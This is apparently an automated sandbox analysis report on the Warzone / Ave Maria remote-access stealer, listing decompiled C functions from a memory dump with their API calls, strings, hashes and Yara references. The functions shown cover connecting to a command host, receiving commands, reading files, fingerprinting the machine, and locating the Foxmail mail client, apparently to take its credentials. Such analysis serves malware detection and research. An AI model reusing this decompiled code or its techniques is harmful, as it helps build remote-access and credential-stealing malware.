                                  • Opcode Fuzzy Hash: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction Fuzzy Hash: F6F0B4342443005FDB106F64FC289BA3BB8AE94B53300013EF806D3B60DB79DC499A19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040594B, Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040594B(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx;
				E00403237(__ecx,  &_a4);
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0041178E(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0);
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E00405FEB(_a4);
				return _t53;
			}















                                  0x00405951
                                  0x0040595c
                                  0x0040595e
                                  0x0040596c
                                  0x0040596f
                                  0x00405976
                                  0x0040597c
                                  0x00405981
                                  0x00405989
                                  0x00405994
                                  0x00405995
                                  0x00405998
                                  0x004059a0
                                  0x004059ff
                                  0x004059ff
                                  0x004059a2
                                  0x004059aa
                                  0x004059ad
                                  0x004059af
                                  0x004059b5
                                  0x004059bb
                                  0x00000000
                                  0x004059bd
                                  0x004059c0
                                  0x004059c8
                                  0x004059ce
                                  0x004059d2
                                  0x004059d5
                                  0x004059de
                                  0x004059e5
                                  0x004059f1
                                  0x004059fa
                                  0x00405a18
                                  0x00405a1b
                                  0x004059fc
                                  0x004059fc
                                  0x00000000
                                  0x004059fc
                                  0x004059fa
                                  0x004059bb
                                  0x00405a04
                                  0x00405a0f

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,74A313FB,?,?,00000000,00404FB9,?,?,?,?,?,00000000,74A313FB), ref: 00411792
                                  • getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                  • htons.WS2_32(00000000), ref: 004059D5
                                  • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                  • connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                  • String ID:
                                  • API String ID: 2516106447-0
                                  • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                  • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C30D, Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040C30D(WCHAR* __ecx, void** __edx, long* _a4) {
				void** _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				long* _t14;
				long _t16;
				void* _t17;
				long* _t24;
				void* _t32;
				struct _OVERLAPPED* _t34;
				void* _t36;

				_t34 = 0;
				_v8 = __edx;
				_t36 =  *0x42696c - _t34; // 0x0
				if(_t36 == 0) {
					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
					if(_t32 != 0 && _t32 != 0xffffffff) {
						_t14 =  &_v20;
						__imp__GetFileSizeEx(_t32, _t14);
						if(_t14 != 0 && _v16 == 0) {
							_t16 = _v20;
							_t24 = _a4;
							 *_t24 = _t16;
							_t17 = LocalAlloc(0x40, _t16);
							 *_v8 = _t17;
							if(_t17 != 0) {
								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
									LocalFree( *_v8);
								} else {
									_t34 = 1;
								}
							}
						}
						CloseHandle(_t32);
					}
				} else {
					_t34 = E0040C3B9(__ecx, __edx, _a4);
				}
				return _t34;
			}














                                  0x0040c314
                                  0x0040c318
                                  0x0040c31b
                                  0x0040c321
                                  0x0040c347
                                  0x0040c34b
                                  0x0040c352
                                  0x0040c357
                                  0x0040c35f
                                  0x0040c366
                                  0x0040c36a
                                  0x0040c370
                                  0x0040c372
                                  0x0040c37b
                                  0x0040c37f
                                  0x0040c392
                                  0x0040c3a5
                                  0x0040c39b
                                  0x0040c39d
                                  0x0040c39d
                                  0x0040c392
                                  0x0040c3ab
                                  0x0040c3ad
                                  0x0040c3ad
                                  0x0040c323
                                  0x0040c32c
                                  0x0040c32c
                                  0x0040c3b8

                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C341
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C38A
                                  • CloseHandle.KERNEL32(00000000), ref: 0040C3AD
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 4225742195-0
                                  • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                  • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040577F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040577F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t47;
				char* _t54;
				intOrPtr _t79;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t114;
				char* _t115;
				char _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t114 = __edx;
				_t89 = __ecx;
				_t47 = E004011C0(0x10040, __ecx);
				_t88 = _t89;
				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
					_t117 = 0;
					E00401052( &_v65600, 0, 0xffff);
					_t120 = _t119 + 0xc;
					_v60 = 0;
					_v56 = 0;
					E00403115( &_v52, _t114, E004034D1( &_v12, "warzoneTURBO"));
					E00405FEB(_v12);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t54 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117);
						_t115 = _t54;
						if(_t115 != 0xc) {
							goto L8;
						}
						_v16 = _t117;
						_t106 =  &_v16;
						_v12 = _t117;
						E004030CC( &_v16,  &_v65600, _t54);
						_t107 = _t120;
						E0040315E(_t120,  &_v16);
						E0040315E(_t120,  &_v52);
						E004061F0( &_v44, _t114, _t120, _t107,  &_v16, _t106);
						_t120 = _t120 + 0x10;
						_t79 =  *((intOrPtr*)(_v44 + 4));
						_t118 = _t79 + 0xc;
						if(_t79 == 0 || _t118 == _t115) {
							L7:
							E00403148( &_v44);
							E00403148( &_v16);
							L9:
							_t96 =  &_v24;
							E004030CC( &_v24,  &_v65600, _t115);
							_t97 = _t120;
							E0040315E(_t120,  &_v24);
							E0040315E(_t120,  &_v52);
							E004061F0( &_v36, _t114, _t120, _t97,  &_v24, _t96);
							_t120 = _t120 + 0x10;
							E004030FE(_t88 + 0x10);
							E004030CC(_t88 + 0x10, _v36, _t115);
							E004030FE( &_v24);
							E004030FE( &_v36);
							E0040507E(_t88, _t114, _a4);
							E00403148( &_v36);
							if(_t115 <= 0) {
								goto L12;
							}
							_t117 = 0;
							continue;
						} else {
							while(1) {
								_t85 =  &_v65600 + _t115;
								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
								if(_t85 == 0xffffffff) {
									break;
								}
								_t115 = _t115 + _t85;
								if(_t118 != _t115) {
									continue;
								}
								goto L7;
							}
							E00403148( &_v44);
							E00403148( &_v16);
							L12:
							E00403148( &_v24);
							E00403148( &_v52);
							return E00403148( &_v60);
						}
						L8:
						if(_t115 == 0xffffffff) {
							goto L12;
						}
						goto L9;
					}
				}
				return _t47;
			}


























                                  0x0040577f
                                  0x0040577f
                                  0x00405787
                                  0x0040578d
                                  0x00405795
                                  0x004057a0
                                  0x004057b6
                                  0x004057bd
                                  0x004057c7
                                  0x004057cc
                                  0x004057cf
                                  0x004057d5
                                  0x004057e6
                                  0x004057ee
                                  0x004057f3
                                  0x004057f6
                                  0x004057f9
                                  0x004057fc
                                  0x00405806
                                  0x0040580c
                                  0x00405811
                                  0x00000000
                                  0x00000000
                                  0x0040581e
                                  0x00405822
                                  0x00405825
                                  0x00405828
                                  0x00405832
                                  0x00405835
                                  0x00405842
                                  0x0040584a
                                  0x00405852
                                  0x00405855
                                  0x00405858
                                  0x0040585d
                                  0x0040588b
                                  0x0040588e
                                  0x00405896
                                  0x004058a6
                                  0x004058ae
                                  0x004058b1
                                  0x004058bb
                                  0x004058be
                                  0x004058cb
                                  0x004058d3
                                  0x004058d8
                                  0x004058de
                                  0x004058ea
                                  0x004058f2
                                  0x004058fa
                                  0x00405904
                                  0x0040590c
                                  0x00405913
                                  0x00000000
                                  0x00000000
                                  0x00405915
                                  0x00000000
                                  0x00405863
                                  0x00405863
                                  0x00405870
                                  0x00405876
                                  0x0040587f
                                  0x00000000
                                  0x00000000
                                  0x00405885
                                  0x00405889
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405889
                                  0x0040591f
                                  0x00405927
                                  0x0040592c
                                  0x0040592f
                                  0x00405937
                                  0x00000000
                                  0x0040593f
                                  0x0040589d
                                  0x004058a0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004058a0
                                  0x004057f9
                                  0x00405948

                                  APIs
                                  • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                  • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                  • String ID: `$warzoneTURBO
                                  • API String ID: 3973575906-3455775371
                                  • Opcode ID: a486f593b1c2fc96c34f78f1041c930cda7c6560ca54a487b91204276bde7ff6
                                  • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                  • Opcode Fuzzy Hash: a486f593b1c2fc96c34f78f1041c930cda7c6560ca54a487b91204276bde7ff6
                                  • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E27, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00402E27(char __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				char _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E00410D2D(E00410E5E( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E004134A2( &_v344,  &_v16);
				_v12 = 0;
				E00413279(_t28, _v16, 0x10ad,  &_v12);
				_t82 = _t81 + 4;
				E004036F7(_t82, _v20);
				E004036F7(_t82, _v24);
				_t32 = E00410F3E();
				E004036F7(_t82, 0x417668);
				_t64 = _t82;
				E0041119D(_t82);
				_t35 = E00411177(_t82);
				_t36 = E0041111B();
				_t37 = E00410F61();
				E004111D7(_t82, _v16);
				E00405044(_t54, E0040430E( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E004042CC( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E00401052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E0040906F(_t54, 1);
					_v12 = 0x41a8b0;
					E00405044(_t54,  &_v12);
				}
				E00405FEB(_v20);
				return E00405FEB(_v24);
			}






















                                  0x00402e27
                                  0x00402e32
                                  0x00402e38
                                  0x00402e42
                                  0x00402e56
                                  0x00402e5f
                                  0x00402e68
                                  0x00402e7b
                                  0x00402e7e
                                  0x00402e86
                                  0x00402e8e
                                  0x00402e97
                                  0x00402e9c
                                  0x00402ead
                                  0x00402eb3
                                  0x00402eb5
                                  0x00402eba
                                  0x00402ec0
                                  0x00402ec6
                                  0x00402ed5
                                  0x00402ee5
                                  0x00402eed
                                  0x00402ef7
                                  0x00402f06
                                  0x00402f1a
                                  0x00402f2c
                                  0x00402f3a
                                  0x00402f43
                                  0x00402f4b
                                  0x00402f55
                                  0x00402f55
                                  0x00402f5d
                                  0x00402f6e

                                  APIs
                                    • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                    • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                    • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                    • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                    • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                    • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                    • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402F1A
                                  • lstrcatW.KERNEL32 ref: 00402F2C
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                    • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                    • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                    • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                    • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                    • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                  • String ID: \Microsoft Vision\
                                  • API String ID: 1987359387-1618823865
                                  • Opcode ID: c8175ba5bba8b39de2ed917726930458d72d9ec0ecf5b7918431273851232b1e
                                  • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                  • Opcode Fuzzy Hash: c8175ba5bba8b39de2ed917726930458d72d9ec0ecf5b7918431273851232b1e
                                  • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412049, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00412049(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E00411E6D();
				_push(__ecx);
				_t16 = E00411E88(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E00412049,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E00411CE3(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E004120F8( &_v16, _t47, E004036F7( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E00405FEB(_v8);
						_v8 = 0;
						E00405FEB(0);
						_push(0);
						_v12 = 0;
						E004120F8( &_v16, _t47, E004036F7( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E00405FEB(_v8);
						_v8 = 0;
						return E00405FEB(0);
					}
				}
				return _t16;
			}












                                  0x00412049
                                  0x00412050
                                  0x00412055
                                  0x0041205d
                                  0x00412065
                                  0x00412076
                                  0x00412078
                                  0x0041207b
                                  0x0041207d
                                  0x0041207f
                                  0x0041208f
                                  0x00412095
                                  0x00412099
                                  0x004120ae
                                  0x004120b6
                                  0x004120bd
                                  0x004120c0
                                  0x004120c5
                                  0x004120c9
                                  0x004120de
                                  0x004120e6
                                  0x004120ed
                                  0x00000000
                                  0x004120f0
                                  0x0041207d
                                  0x004120f7

                                  APIs
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • MessageBoxA.USER32 ref: 0041208F
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • VirtualQuery, xrefs: 00412056
                                  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
                                  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                  • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                  • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                  • API String ID: 1196126833-2308542105
                                  • Opcode ID: 3b9f17e5ee25b29376746fec1db752dd3733cf3cace8c00c7f8d8b87597a7d89
                                  • Instruction ID: b002b8fab82c5f8035800c071d4aecb67a577e28dec50426e7e7b6f2e11e6f57
                                  • Opcode Fuzzy Hash: 3b9f17e5ee25b29376746fec1db752dd3733cf3cace8c00c7f8d8b87597a7d89
                                  • Instruction Fuzzy Hash: C2113D71A40119BACB08EBA5D956CEF7B7CAE08704B10416FB502B2181DF785F85D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C5E8, Relevance: 8.8, APIs: 7, Instructions: 35COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C5E8(void* __ecx) {
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if(__ecx != 0) {
					if( *(__ecx + 0x30) != 0) {
						LocalFree( *(__ecx + 0x30));
					}
					if( *(_t25 + 0x40) != 0) {
						LocalFree( *(_t25 + 0x40));
					}
					if( *(_t25 + 0x48) != 0) {
						LocalFree( *(_t25 + 0x48));
					}
					if( *(_t25 + 0x58) != 0) {
						LocalFree( *(_t25 + 0x58));
					}
					if( *(_t25 + 0x60) != 0) {
						LocalFree( *(_t25 + 0x60));
					}
					if( *(_t25 + 0x68) != 0) {
						LocalFree( *(_t25 + 0x68));
					}
					return LocalFree(_t25);
				}
				return _t13;
			}





                                  0x0040c5e9
                                  0x0040c5ed
                                  0x0040c5fa
                                  0x0040c5ff
                                  0x0040c5ff
                                  0x0040c605
                                  0x0040c60a
                                  0x0040c60a
                                  0x0040c610
                                  0x0040c615
                                  0x0040c615
                                  0x0040c61b
                                  0x0040c620
                                  0x0040c620
                                  0x0040c626
                                  0x0040c62b
                                  0x0040c62b
                                  0x0040c631
                                  0x0040c636
                                  0x0040c636
                                  0x00000000
                                  0x0040c63b
                                  0x0040c63d

                                  APIs
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID:
                                  • API String ID: 2826327444-0
                                  • Opcode ID: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction ID: 62e6c422cf591d6120044b1c94743719a7044ae546b32db2f753074c0c434ab8
                                  • Opcode Fuzzy Hash: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction Fuzzy Hash: 6BF0EC30011B14DBD7326B26CC447A7B6A1BF80305F151E3AD08121AB0C77AA896DF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004094FF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004094FF(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x426868,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x426868);
						_t7 = 1;
					}
				}
				return _t7;
			}






                                  0x00409522
                                  0x00409556
                                  0x00409556
                                  0x00409524
                                  0x00409527
                                  0x00409549
                                  0x00000000
                                  0x0040954b
                                  0x0040954c
                                  0x00409552
                                  0x00409552
                                  0x00409549
                                  0x0040955a

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                  • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                  • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileOpenPathQueryRemoveSpecValue
                                  • String ID: Executable$software\Aerofox\FoxmailPreview
                                  • API String ID: 3687894118-2371247776
